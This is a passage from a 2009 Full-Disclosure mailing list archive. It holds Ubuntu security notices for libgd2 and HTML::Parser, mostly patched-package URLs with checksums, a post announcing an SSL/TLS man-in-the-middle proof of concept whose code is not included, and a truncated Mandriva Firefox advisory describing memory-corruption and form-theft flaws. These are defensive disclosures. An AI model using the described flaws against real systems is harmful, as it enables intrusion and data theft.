  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_lpia.deb
      Size/MD5:   211954 e775cc54a3a24eab57184ba4cd80e9aa
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_lpia.deb
      Size/MD5:   209030 ce49cbe652495669f47a54b6e4e29795
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_lpia.deb
      Size/MD5:   214092 6d0e18a51be52249139a9b9ca66bfbc7
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_lpia.deb
      Size/MD5:   211218 5a804b00b6b3c915123cf05e12e14434
    http://ports.ubuntu.com/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_lpia.deb
      Size/MD5:    17798 da21ca96e5abc06e9ae7ce6df48306e7

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_powerpc.deb
      Size/MD5:   220994 0fc96e78170cc201002082d8b790b398
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_powerpc.deb
      Size/MD5:   216112 84090bd428afa9840f0c815808bc9944
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_powerpc.deb
      Size/MD5:   223368 d88a20d286892ec6f067e06b3eb81e7a
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_powerpc.deb
      Size/MD5:   218320 c82eb96e8061fcc55f4d05836fd821cc
    http://ports.ubuntu.com/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_powerpc.deb
      Size/MD5:    27322 a1f8627970e51ee1edfd96b7d6bb5a52

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_sparc.deb
      Size/MD5:   211908 61bc8a1e4d9f5ac3336981ee5a297b3e
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_sparc.deb
      Size/MD5:   206664 9dc649281c574ddae6098dcba1bc2b4a
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_sparc.deb
      Size/MD5:   214364 43588afd1df97e39561f2b858e347dec
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_sparc.deb
      Size/MD5:   208834 cad75d76f33068bf0fefffb08d0c4319
    http://ports.ubuntu.com/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_sparc.deb
      Size/MD5:    18738 975c39c043c1627fab52a981fbdec336

Updated packages for Ubuntu 9.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg-3ubuntu1.9.04.1.diff.gz
      Size/MD5:    30247 9114e8b92ac867d48c84b40e5de119b5
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg-3ubuntu1.9.04.1.dsc
      Size/MD5:     1695 806082d3e955a27f5f725e6423567afb
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg.orig.tar.gz
      Size/MD5:   761899 0f4d2fa45627af0e87fcb74f653b66dd

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_amd64.deb
      Size/MD5:   219948 3ee02e54449d23e19f4bdad856db3e94
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_amd64.deb
      Size/MD5:   212918 c14ac0c6aaa4710840cab2027bc49eb6
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_amd64.deb
      Size/MD5:   222236 5bdf89e2f69274160b0c543461dd4447
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_amd64.deb
      Size/MD5:   215338 c7b162d896956ac9f97bc5ef5a4f19ce
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_amd64.deb
      Size/MD5:    19458 c6ff85b327aa9d9255cf6167e880919b

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_i386.deb
      Size/MD5:   211648 c95bd0c9742fc59e1c7eafce79293970
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_i386.deb
      Size/MD5:   208700 fc3065061bd6dc7109ab0bcf70783108
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_i386.deb
      Size/MD5:   213824 05132639e083a74172b533558a31ba9c
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_i386.deb
      Size/MD5:   210848 6bb0c2ac1b44880f8946f2c88c9152f7
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_i386.deb
      Size/MD5:    17854 020eb3d7e630c04f421011e01a3ab417

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_lpia.deb
      Size/MD5:   211938 88ddcd34f6c54f70e82eac5af941c59a
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_lpia.deb
      Size/MD5:   209024 742a54caabb80548765c7a411281c010
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_lpia.deb
      Size/MD5:   214076 80b1e57b7ac85f0b678712dd924bf45e
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_lpia.deb
      Size/MD5:   211160 179c604147f0da8bc4bc9eb027a46e32
    http://ports.ubuntu.com/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_lpia.deb
      Size/MD5:    17786 04f24c5d4d0010d42b91b63726cbff89

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_powerpc.deb
      Size/MD5:   220998 add2de0d80ba76d36451c7fd5e2c5ec6
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_powerpc.deb
      Size/MD5:   216092 c1fdc00eba685bb143c14dfd383cb634
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_powerpc.deb
      Size/MD5:   223358 08de60d5f7560471076770e03c1ff864
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_powerpc.deb
      Size/MD5:   218276 8dbcb65ccb85507d9d9963134366bba9
    http://ports.ubuntu.com/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_powerpc.deb
      Size/MD5:    27326 5428b1461321872221f14af0be9ca46b

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_sparc.deb
      Size/MD5:   211904 aa0c223bc1a2a54a1cba6791344deabd
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_sparc.deb
      Size/MD5:   206600 4eb3f388e8ff46b37706f51c3c9dfc96
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_sparc.deb
      Size/MD5:   214364 b2eb3db5b306d85af16d40c44431032f
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_sparc.deb
      Size/MD5:   208764 24566329bbb403d4d891e8d79e0046b1
    http://ports.ubuntu.com/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.9.04.1_sparc.deb
      Size/MD5:    18744 502a67b239cf0f7d8b61b69bfa70dc68

Updated packages for Ubuntu 9.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg-3ubuntu1.9.10.1.diff.gz
      Size/MD5:    30249 6c2f3c7c02d7f69d50ed5ffc7197b7de
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg-3ubuntu1.9.10.1.dsc
      Size/MD5:     1695 b05d9d806f7c09b300a03d58361fd100
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg.orig.tar.gz
      Size/MD5:   761899 0f4d2fa45627af0e87fcb74f653b66dd

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_amd64.deb
      Size/MD5:   220902 55be622b462feb7219692bc6d0fc4016
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_amd64.deb
      Size/MD5:   213832 4669837f252534f290f3c7dc8aa9c223
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_amd64.deb
      Size/MD5:   223176 9e64773dbc9a4f6c0d3dcce2ef4be386
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_amd64.deb
      Size/MD5:   216308 8f47355cc8c818ad8c7f235a03fcc67b
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_amd64.deb
      Size/MD5:    19578 fa5acd3d4ed0d38c557ac3ae9956cccc

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_i386.deb
      Size/MD5:   211556 ca2bff218a8adc5983a969d872fb6b06
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_i386.deb
      Size/MD5:   208578 b384c376d002f0985b1d443ee5875231
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_i386.deb
      Size/MD5:   213810 5fe2e224224d3fe70135dc401f10e042
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_i386.deb
      Size/MD5:   210680 5cb31f48ba665e97873240bca35d0df9
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_i386.deb
      Size/MD5:    17932 44522c5bbae0da3e1b6f12c969bd9780

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_lpia.deb
      Size/MD5:   211756 05ff9aa04779bd808d3d11de4c793c0f
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_lpia.deb
      Size/MD5:   208578 51ff00ac1ccf5ee7ddfd96bdbbd630a5
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_lpia.deb
      Size/MD5:   213898 a32989d6a1d706ef2400655dba7692d2
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_lpia.deb
      Size/MD5:   210686 78086d8025414976501cddfeb9495459
    http://ports.ubuntu.com/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_lpia.deb
      Size/MD5:    17938 73e13e49bba851a6249df8c6454b6e3d

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_powerpc.deb
      Size/MD5:   222046 59e46ae219de5a321c4392aa05796e9f
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_powerpc.deb
      Size/MD5:   214998 0601765bd180d78e552cb64f83e70cca
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_powerpc.deb
      Size/MD5:   224372 25f3258333a51d80791f8bbe229b3e09
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_powerpc.deb
      Size/MD5:   217170 53ed85c9a0a75892e19c41aee045d82d
    http://ports.ubuntu.com/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_powerpc.deb
      Size/MD5:    18728 1bb235f1e0f8891698dc336a1329b075

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_sparc.deb
      Size/MD5:   213288 9ede7ae62429404acc302982c1af74ed
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_sparc.deb
      Size/MD5:   207760 18ff396ddc2982df67ec2384c794bef2
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_sparc.deb
      Size/MD5:   215770 8561766182b28b196f63b332d9ad57f5
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_sparc.deb
      Size/MD5:   209844 30e13659020c5d85a00e292c439777fd
    http://ports.ubuntu.com/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.9.10.1_sparc.deb
      Size/MD5:    18724 015a4a171a3add4f468bd950741c77e5



-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091105/2d65da5a/attachment.bin 

From marc.deslauriers at canonical.com  Thu Nov  5 20:28:34 2009
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Thu, 05 Nov 2009 15:28:34 -0500
Subject: [Full-disclosure] [USN-855-1] libhtml-parser-perl vulnerability
Message-ID: <1257452914.27175.2.camel@mdlinux.technorage.com>

===========================================================
Ubuntu Security Notice USN-855-1          November 05, 2009
libhtml-parser-perl vulnerability
CVE-2009-3627
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libhtml-parser-perl             3.48-1ubuntu0.1

Ubuntu 8.04 LTS:
  libhtml-parser-perl             3.56-1ubuntu0.1

Ubuntu 8.10:
  libhtml-parser-perl             3.56-1ubuntu2.1

Ubuntu 9.04:
  libhtml-parser-perl             3.59-1ubuntu1.1

Ubuntu 9.10:
  libhtml-parser-perl             3.61-1ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Mark Martinec discovered that HTML::Parser incorrectly handled strings
with incomplete entities. An attacker could send specially crafted input to
applications that use HTML::Parser and cause a denial of service.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.48-1ubuntu0.1.diff.gz
      Size/MD5:     6020 5e20b1b31734934ef3675f25f200f83a
    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.48-1ubuntu0.1.dsc
      Size/MD5:      872 1dcd5059889167cd0a763edf56a35e75
    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.48.orig.tar.gz
      Size/MD5:    82678 3fe8ca230ff8efc55327a12d94193a58

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.48-1ubuntu0.1_amd64.deb
      Size/MD5:   104822 675f04b3e4597bd5f37b3cc2f8be7624

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.48-1ubuntu0.1_i386.deb
      Size/MD5:   103604 3cac785448f5a50af09fdbac4eb9af89

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.48-1ubuntu0.1_powerpc.deb
      Size/MD5:   104868 01c337175212fb4c77100f9bee77ef0b

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.48-1ubuntu0.1_sparc.deb
      Size/MD5:   103780 0ea0484df5b8a99a0f1ccdccb7c7f879

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu0.1.diff.gz
      Size/MD5:     6251 18a1208395cb520be2b81c1f1d8abfe2
    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu0.1.dsc
      Size/MD5:      971 0ed26b2e94f55ca531022775dcfd003b
    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56.orig.tar.gz
      Size/MD5:    86040 bddc432e5ed9df4d4153a62234f04fc2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu0.1_amd64.deb
      Size/MD5:   107586 85f881920a5c4153534b9898b0dc1e5b

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu0.1_i386.deb
      Size/MD5:   106890 b3e7fa4c17c91de3cef44acefd4d9592

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu0.1_lpia.deb
      Size/MD5:   106904 ddd831359f423a853e4f03ddf8d19bae

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu0.1_powerpc.deb
      Size/MD5:   109816 70d33ab9837ea9359179d72df02d9c00

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu0.1_sparc.deb
      Size/MD5:   106112 720ef03704f474f7acc6b59376e69fef

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu2.1.diff.gz
      Size/MD5:     6447 656e10374000f1699aab812e628d09ca
    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu2.1.dsc
      Size/MD5:     1406 f90b11908b2f746858be35833f59ec2f
    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56.orig.tar.gz
      Size/MD5:    86040 bddc432e5ed9df4d4153a62234f04fc2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu2.1_amd64.deb
      Size/MD5:   111068 6b8422e58a0952c0095b732e3a3ce932

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu2.1_i386.deb
      Size/MD5:   110390 119b245d5a985f4a9a4d6cca6a3db226

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu2.1_lpia.deb
      Size/MD5:   110234 7c0aac642ece40f1d074d9e5704fd8ec

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu2.1_powerpc.deb
      Size/MD5:   113094 a6d3551ab048bb2deddffbe3b6db84b7

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.56-1ubuntu2.1_sparc.deb
      Size/MD5:   109644 c09e75a35bd9ecdffe682dd1a7db3031

Updated packages for Ubuntu 9.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.59-1ubuntu1.1.diff.gz
      Size/MD5:     7156 776e572797f750ad48a5fd337c2fa7d1
    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.59-1ubuntu1.1.dsc
      Size/MD5:     1622 b722fe175e9ced66084ec4e836c77a69
    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.59.orig.tar.gz
      Size/MD5:    87314 190950f442ff4a8e59e637714105a01b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.59-1ubuntu1.1_amd64.deb
      Size/MD5:   112444 ec63107d297595f7b2e6ea994bd8530d

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.59-1ubuntu1.1_i386.deb
      Size/MD5:   111810 82ed44cd451170d87caa79a8018fbcf1

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.59-1ubuntu1.1_lpia.deb
      Size/MD5:   111626 cede79a0ef0de1e1a39cb396d14c3829

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.59-1ubuntu1.1_powerpc.deb
      Size/MD5:   114632 a29ae197e03d49948a8cfae4a00d8619

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.59-1ubuntu1.1_sparc.deb
      Size/MD5:   111076 aa9a8dc65044b72d4eee576be5a34a0a

Updated packages for Ubuntu 9.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.61-1ubuntu0.1.diff.gz
      Size/MD5:     6905 721edd6408f7ae8359e177440030efe0
    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.61-1ubuntu0.1.dsc
      Size/MD5:     1725 c93a277c8bba6fce57dd497d6c63c21a
    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.61.orig.tar.gz
      Size/MD5:    88269 098d9551721d29d55a0a4ad83a3ebef5

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.61-1ubuntu0.1_amd64.deb
      Size/MD5:   112854 ec6767383c1aff96ed1b395794af5a8f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.61-1ubuntu0.1_i386.deb
      Size/MD5:   112302 c020b828d39f2f1456df8c988aebd4fd

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.61-1ubuntu0.1_lpia.deb
      Size/MD5:   112194 338bb4738ec2501286379642a0e7e740

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.61-1ubuntu0.1_powerpc.deb
      Size/MD5:   113172 0d8e8bc85c07fd91b65e0792d6eec9a0

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libh/libhtml-parser-perl/libhtml-parser-perl_3.61-1ubuntu0.1_sparc.deb
      Size/MD5:   111260 de6ee17857af6dbdfdd6a42a207e8714



-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091105/58ada639/attachment.bin 

From peak at argo.troja.mff.cuni.cz  Thu Nov  5 21:54:48 2009
From: peak at argo.troja.mff.cuni.cz (Pavel Kankovsky)
Date: Thu, 5 Nov 2009 22:54:48 +0100 (MET)
Subject: [Full-disclosure] SSL/TLS MiTM PoC
Message-ID: <20091105225114.7AD7.0@argo.troja.mff.cuni.cz>

It might not work with up-to-date OpenSSL.
Fixing that is left as an exercise for the reader.

-- 
Pavel Kankovsky aka Peak                          / Jeremiah 9:21        \
"For death is come up into our MS Windows(tm)..." \ 21st century edition /
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: ssl.c
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091105/3f2874a6/attachment.c 

From security at mandriva.com  Fri Nov  6 00:52:00 2009
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 06 Nov 2009 01:52:00 +0100
Subject: [Full-disclosure] [ MDVSA-2009:294 ] firefox
Message-ID: <E1N6D3Y-0000EM-8Y@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:294
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : firefox
 Date    : November 5, 2009
 Affected: 2010.0
 _______________________________________________________________________

 Problem Description:

 Security issues were identified and fixed in firefox 3.5.x:
 
 Security researcher Alin Rad Pop of Secunia Research reported a
 heap-based buffer overflow in Mozilla's string to floating point
 number conversion routines. Using this vulnerability an attacker
 could craft some malicious JavaScript code containing a very long
 string to be converted to a floating point number which would result
 in improper memory allocation and the execution of an arbitrary memory
 location. This vulnerability could thus be leveraged by the attacker
 to run arbitrary code on a victim's computer (CVE-2009-1563).
 
 Security researcher Jeremy Brown reported that the file naming scheme
 used for downloading a file which already exists in the downloads
 folder is predictable. If an attacker had local access to a victim's
 computer and knew the name of a file the victim intended to open
 through the Download Manager, he could use this vulnerability to
 place a malicious file in the world-writable directory used to save
 temporary downloaded files and cause the browser to choose the
 incorrect file when opening it. Since this attack requires local
 access to the victim's machine, the severity of this vulnerability
 was determined to be low (CVE-2009-3274).
 
 Security researcher Paul Stone reported that a user's form history,
 both from web content as well as the smart location bar, was vulnerable
 to theft. A malicious web page could synthesize events such as mouse
 focus and key presses on behalf of the victim and trick the browser
 into auto-filling the form fields with history entries and then
 reading the entries (CVE-2009-3370).
 
 Security researcher Orlando Berrera of Sec Theory reported that
 recursive creation of JavaScript web-workers can be used to create a
 set of objects whose memory could be freed prior to their use. These
 conditions often result in a crash which could potentially be
 used by an attacker to run arbitrary code on a victim's computer
 (CVE-2009-3371).
 
